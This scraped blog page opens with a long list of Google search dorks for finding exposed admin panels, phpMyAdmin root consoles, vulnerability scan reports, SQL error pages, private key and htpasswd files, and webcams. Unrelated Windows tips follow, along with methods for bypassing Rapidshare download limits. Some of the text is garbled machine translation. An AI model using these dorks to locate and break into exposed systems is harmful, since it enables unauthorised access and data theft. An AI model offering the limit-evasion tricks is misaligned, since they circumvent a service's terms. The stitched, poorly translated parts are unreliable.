php-addressbook "This is the addressbook for *" -warning
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
site:edu admin grades
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!

Fichier contenant des informations sur le r?seau :

filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last updated" "Daily"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:testcgi xitami
inurl:webalizer filetype:png -opendarwin
Looking Glass intitle:That.Site.Running Apache
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The script whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this script not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" ""
"html allowed" guestbook
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/
allinurl:"index.php" "site=sglinks"
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6"
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"index.php? module=ew_filemanager"
inurl:newsdesk.cgi? inurl:"t="
inurl:search.php vbulletin
natterchat inurl:home.asp
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
+ View Webcam User Accessing allinurl:control/multiview inurl:"ViewerFrame?Mode=" intitle:"WJ-NT104 Main Page" inurl:netw_tcp.shtml intitle:"supervisioncam protocol"

Browse Rapidshare Files And Folders


Code: inurl:users "*" inurl:users "*" inurl:files "*" inurl:files "*" inurl:users (pass|password) inurl:users (pass|password) inurl:users "hack" inurl:users "hacking"

Increase your cable modem or DSL speed in Windows XP

This tweak is for broad band cable connections on stand alone machines with winXP professional version - might work on Home version also. It will probably work with networked machines as well but I haven't tried it in that configuration. This is for windows XP only, it does not work on win2000.
I use 3 Com cards so I don't know how it works on others at this point. It does not involve editing the registry. This tweak assumes that you have let winXP create a connection on install for your cable modem/NIC combination and that your connection has tcp/ip - QoS - file and print sharing - and client for microsoft networks , only, installed. It also assumes that winxp will detect your NIC and has in-box drivers for it. If it doesn't do not try this.
In the "My Network Places" properties (right click on the desktop icon and choose properties), highlight the connection then at the menu bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK

  1. From the windows XP cd in the support directory from the support cab, extract the file netcap.exe and place it in a directory on your hard drive or even in the root of your C:\ drive.
  2. next, open up a command prompt window and change directories to where you put netcap.exe. then type "netcap/?". It will list some commands that are available for netcap and a netmon driver will be installed. At the bottom you will see your adapters. You should see two of them if using a 3Com card. One will be for LAN and the other will be for WAN something or other.
  3. Next type "netcap/Remove". This will remove the netmon driver.
  4. Open up control panel / system / dev man and look at your network adapters. You should now see two of them and one will have a yellow ! on it. Right click on the one without the yellow ! and choose uninstall. YES! you are uninstalling your network adapter, continue with the uninstall. Do not restart yet.
  5. Check your connection properties to make sure that no connection exists. If you get a wizard just cancel out of it.
  6. Now re-start the machine.
  7. After re-start go to your connection properties again and you should have a new connection called "Local area connection 2". highlight the connection then at the menu bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK.
  8. Choose connection properties and uncheck the "QOS" box
  9. Re-start the machine
  10. after restart enjoy the increased responsivness of IE, faster page loading, and a connection speed boost.
Why it works, it seems that windows XP, in its zeal to make sure every base is covered installs two seperate versions of the NIC card. One you do not normally see in any properties. Remember the "netcap/?" command above showing two different adapters? The LAN one is the one you see. The invisible one loads everything down and its like your running two separate cards together, sharing a connection among two cards, this method breaks this "bond" and allows the NIC to run un-hindered.

Windows Vista Installation Guide

SoftwareTip'sPalace offer you full Guide for Microsoft Windows Vista Installation. First we will explain you few important things which you should know about Windows Vista before you start with Installation. Most important thing you should know is Windows Vista Requirements, so first read which Windows Vista Requirements are than you can start with Vista Installation.


Windows Vista is the new operating system developed by Microsoft. After more than five years of development and several delays this new version arrives from shadow. What it more emphasizes when initiating this new version of Windows is its graphical surroundings denominated AERO. Adored by and criticized by others when saying that it is a copy of MacOS X, which is certain, is that it is a great step if we compared it with the previous versions of Windows. According to Microsoft, Windows Vista is the most important version that they have sent since left Windows 95.

Before anything, you have to know that Windows Vista requires quite powerful equipment so that it can work fluidly. Although Microsoft has given two data:

  • Vista Capable (equipment that can run Vista but with the minimum) and,
  • Vista Premium (equipment that will take advantage of all the power Vista).

Those of Redmon have created a tool to know if your equipment can or cannot run Windows Vista as well as which is the version that better adapts you computer. This tool can be downloaded from this link.

Note: Before you start with Windows Vista installation please read Requirements for Window Vista.

Start with Windows Vista Installantion

  1. Now ignites your computer and put the DVD of Windows Vista in DVD-ROM. If the configuration of the BIOS is correct, the disc will begin automatically. If it does not start from the DVD it proves to enter the BIOS and looks for an option that puts “Default Values” to restore the configuration that brought of factory.
  2. When first screen appears you have to select the language in which you are going to install Windows Vista, the format of date and currency and the language of the keyboard. Now press Next.
  3. Now click on the button “Install now” to initiate the installation. In order to recover the system it selects the option “To repair the equipment”.
  4. Insert the product key which you did get with Windows Vista,
  5. If proporcionastes the installation key you will not have to select the version of Windows Vista that you are going to install. Care, selects the corresponding one to your key or otherwise you can lose data. Beam click in “I have selected the acquired version of Windows” and presses following.
  6. Now accept the contract of Final License for User (CLUF), you click in “Acceptance the terms of license” and presses next.
  7. Choose between a clean installation or an update according to if one settles in an empty hard disk or on an installation of existing Windows, in this case conserve all the data.
  8. Select the partition in which you want to install Windows Vista. You can create a new one, format it, erase it, ect… If you do not want to complicate your life just press Next.
  9. Now Windows Vista installation will begin. Be patient until last step is completed, it would not have to last more than 15 minutes.
  10. Once completed last step, the computer will be reinitiated.
  11. Now Windows is going away to prepare to initiate for the first time.
  12. Finally the Windows Vista installation will be completed.
  13. Again the computer will be reinitiated for the last time.
  14. Now you have to write your name and a password. The password can be left in target but he is recommendable to write one. If you need to create more accounts, later you can do it from the Control Panel. It chooses in addition an image for your account, this image you can also change more ahead. After you finish with this step click Next.
  15. It writes a name to identify the equipment within a network and chooses the bottom that you want to use. You can change it later. Again press Next.
  16. It selects that type of updates you wish to install. I recommend selecting the first option but you are an advanced user. If on the contrary you want to install the updates by your account, selects the third option. Later the Following button presses.
  17. Now select your hour zone. If you wish that Windows automatically changes the hour for the summer schedule it marks the square that there is underneath the hour zone. It verifies that the date and the hour are the correct ones and presses the Next button.
  18. Thank You screen will appear, select Start button.
  19. Windows Vista is the first operating system of Microsoft that adapts to each computer of different form. For it, once finished the installation, Windows equipment will carry out a series of test to determine the agreed optimal configuration to you.
  20. Once finalized the test, Windows will begin.
  21. The first time that you initiate Windows Vista it will appear the “Welcome Center” in which you will be able to find of fast form information on your equipment as well as the new characteristics of Windows Vista.
  22. And finally, you have Windows Vista installed in computer.

Folder Options missing from Tools menu in Windows Explorer

NoFolderOptions Policy hides Folder Options from Control Panel, and the Folder Options… command under Tools menu in Windows Explorer. The Folder and Search Options command in the Organize menu (in Windows Vista) is grayed out as well.
If your system is not part of any network and this restriction was enabled without your knowledge, it could be caused by Virus or Malware. There are plenty of
viruses which enable the NoFolderOptions Policy in the registry, and in addition, hides file extensions for known file types. To get the option back, use one of these methods:
Using Registry Editor
Launch Regedit.exe and navigate to:
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer
Delete the NoFolderOptions value (if found) from the above locations
Exit the Registry Editor.
Using Group Policy Editor
Group Policy Editor is not available in Windows XP Home Edition and Windows Vista Home Editions. For all editions of Windows XP and Windows Vista, you may use the .reg file (under paragraph "Registry fix") to remove the Policy setting.
Note that this only resets the NoFolderOptions per-user Policy, whereas NoFolderOptions can be a per-machine setting as well.
1. Launch GPEDIT.MSC
2. Navigate to the following branch:
User Configuration Administrative Templates Windows Components Windows Explorer
3. Double-click Removes the Folder Options menu item from the Tools menu
4. Set it to Not configured
Registry Fix
Download, unzip and run the file folderopt.reg.

Hacks to Beat Rapidshare Download Limits and Waiting Time

Rapidshare has been an excellent tool for sharing large files. Recently users have discovered ways of bypassing the download limits and skipping the waiting time. Here are a description of these methods.

Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server a different IP address.

Here are some methods for doing this:

1. Short-Out the JavaScript:
    1. Goto the page you want to download
    2. Select FREE button
    3. In the address bar put the following: javascript:alert(c=0)
    4. Click OK
    5. Click OK to the pop-up box
    6. Enter the captcha
    7. Download Your File

2. Request a new IP address from your ISP server.
    Here's how to do it in windows:
    1. Click Start
    2. Click run
    3. In the run box type cmd.exe and click OK
    4. When the command prompt opens type the following. ENTER after each new line.
    ipconfig /flushdns
    ipconfig /release
    ipconfig /renew

    5. Erase your cookies in whatever browser you are using.
    6. Try the rapidshare download again.

Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

3. Use a proxy with SwitchProxy and Firefox:

4. Use an anonymous service:
    Running your system through the tornetwork should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.

5. You can use a bookmarklet to stop your wait times:
    1. Open IE
    2. Right Click On This Link
    3. Select Add to Favorites
    4. Select Yes to the warning that the bookmark may be unsafe.
    5. Name it "RapidShare No Wait"
    6. Click on the Links folder (if you want to display it in your IE toolbar)
    7. Click OK
    8. You may need to close and reopen IE to see it
    9. Goto rapidshare and click the bookmarklet when you are forced to wait

Ejecting USB drives from the command line

A client of mine requires me to use their hardware to connect to their network, but I do my development on my own hardware. To keep things straight, I use a external USB hard drive to keep my local copy of their repository. Switching between the machines is kind of a pain, so anytime I can simplify the process, I'm all for it.

Because I'm running IIS and debugging through Visual Studio, I'm not able to "Safely Remove Hardware" using the icon in the dock. IIS keeps a lock on the files on the drive which means I get "The device 'generic volume' cannot be stopped right now. Try stopping the device later." error.

The quickest solution I could find was to perform a "iisreset /restart" from the command line, and then remove hardware.

Too many annoying steps.

I did some research on stopping an external device via the command line, and came across this Ask Leo post. Essentially, Microsoft provides a utility called devcon that lets you stop USB devices from the DOS prompt.

First I ran devcon status * to find out the name of my hard drive. It was something long and nasty:

Name: WD 2500BEV External USB Device
Driver is running.

If I run the following at the command line, it will stop the device (provided nothing else is preventing it from doing so:

devcon remove USBSTOR\DISK*

(The asterisk is a wildcard character and really is needed because the command line pukes on ampersands anyway.)

Being the occasionally smart fellow I am, I created a little batch file I like to call eject.bat:

iisreset /stop
devcon remove USBSTOR\DISK*
iisreset /start

Now, IIS is stopped, the drive ejected, and IIS started again. I just run it from the command line and I've saved myself 13.8 seconds (+/- 20 seconds).

Changing the default command prompt path

You can open a command window from the Run menu (or other applications like Launchy) using cmd, but it may not start from the directory you would like it to. It is easy to change this location.

Setting the default command prompt directory can be done with a simple registry hack. (Standard Disclaimer: change your registry at your own risk. Always backup your registry before making any change.)

In the registry editor, navigate to the following location:

HKEY_CURRENT_USER \ Software \ Microsoft \ Command Processor

If there is not an Autorun string value, create it. Then, set it's value to the directory you would like it to default to in this way:

CD /d c:\

Where c:\ is the path I've chosen as the default.

Also, one of the best power toys available from Microsoft is Open Command Window Here, which adds a context menu (right click) to folders in Windows Explorer, saving you the trouble of navigating to a folder in the command prompt.

Sunday, September 21, 2008

Windows Vista Searching Techniques

Start Menu Search Box

Vista search box in Start Menu can list files in your documents,links,favorites,programs,pictures,music,

videos,indexed entries, My Computer files

Type C:\ or any other drive letter and it will list all the files in the specified drive.

It can even run all the commands that were usually called by the RUN windows

Explorer Search Bar

Open any non-empty folder type any letter and it will display all the files containg that letter, type two letter and the file starting with that letter will show up,type whole filename will list the file.

If you want to gather up files with same extension just type the extension of the file

You can also search with text files. You can also type any tags and file related with it will appear.

Some examples


For searching for files modified within a specific period. syntax




For searching for files with some specific size. synatx




You can aslo use boolean filters for example

install OR setup

will list all files with names install or setup.

or use quotes

“installmessenager” to list the exact file

Change File Attributes

Changing the attribute of file can be troublesome in windows. Attribute Changer has been made to do this easily. It integrates with the Shell Context Menu. Giving you the options to set the file attribute Read-only, Hidden, System, Index, Archive, Compress. It can also change the file Created, Modified, Access Date

Change File Attributes


Monday, September 15, 2008

Restore any Filetype problem in Windows XP

For those people who have any problem with while opening any file type not opening in the default windows gui. I have made a whole registry file.

The problems with filetypes include zip not opening under explorer. Any picture file not opening in the windows defualt viewer.

Note : This file will overwrite any changes made to filetypes by any other program by windows defualts

Change MS Word 2007 Defualt Saving Format from .Docx to .Doc

Microsoft has introduced new formats with Office 07 that created many problems for users of Office 2003 or earlier and OpenOffice Users (OpenOffice currently does not support Office 07 formats)

The only thing you can do to prevent this

Default Word Saving Format

  1. Open Microsoft Word 2007
  2. Click the “Office Button” (top left of your screen), then on the bottom of the list click “Word Options
  3. The “Word Options” window will open. Now click on “Save” in the left panel
  4. Change the top option (in the right panel) “save files in this format” from “Word Document (*.docx)” to “Word 97-2003 Document (*.doc)
  5. Click “OK

New Context Menu Blank Doc Document

Next thing you want to change must be, the New Context Menu to create the Blank .doc document. So here is a reg file to do that. Note: There is a file embedded within this post, please visit this post to download the file.

Eliminate the Docx Blank Document

After applying it you may be seeing two options for word document. You can eliminate the .docx blank document by applying this file

Note: There is a file embedded within this post, please visit this post to download the file.
New Context Menu

To undo the above operation run this file

Search has been Removed in the Context menu (Windows Vista SP1)

While using Windows Vista SP1 you may have noticed that the option of search has been removed from Start Menu, File Folder and Drive Context Menu.
The search can be recoverd

To do this open


go to

and remove the key LegacyDisable.

Next go to


and remove the key LegacyDisable

To Automate the task download the file

Get Search Option Back in Windows Vista Start Menu

Windows vista service pack 1 has changed search option but you can get them back

The method used to get the search option back either replaced your Help and Support option with your search or RUN with the search

To replace Help and Support with search run this reg file

Note: There is a file embedded within this post, please visit this post to download the file.

To replace RUN with search run this reg file

Note: There is a file embedded within this post, please visit this post to download the file.

Note: If you wand to get the Help and Support back click here

Note: There is a file embedded within this post, please visit this post to download the file.

If you wand to get the RUN back click here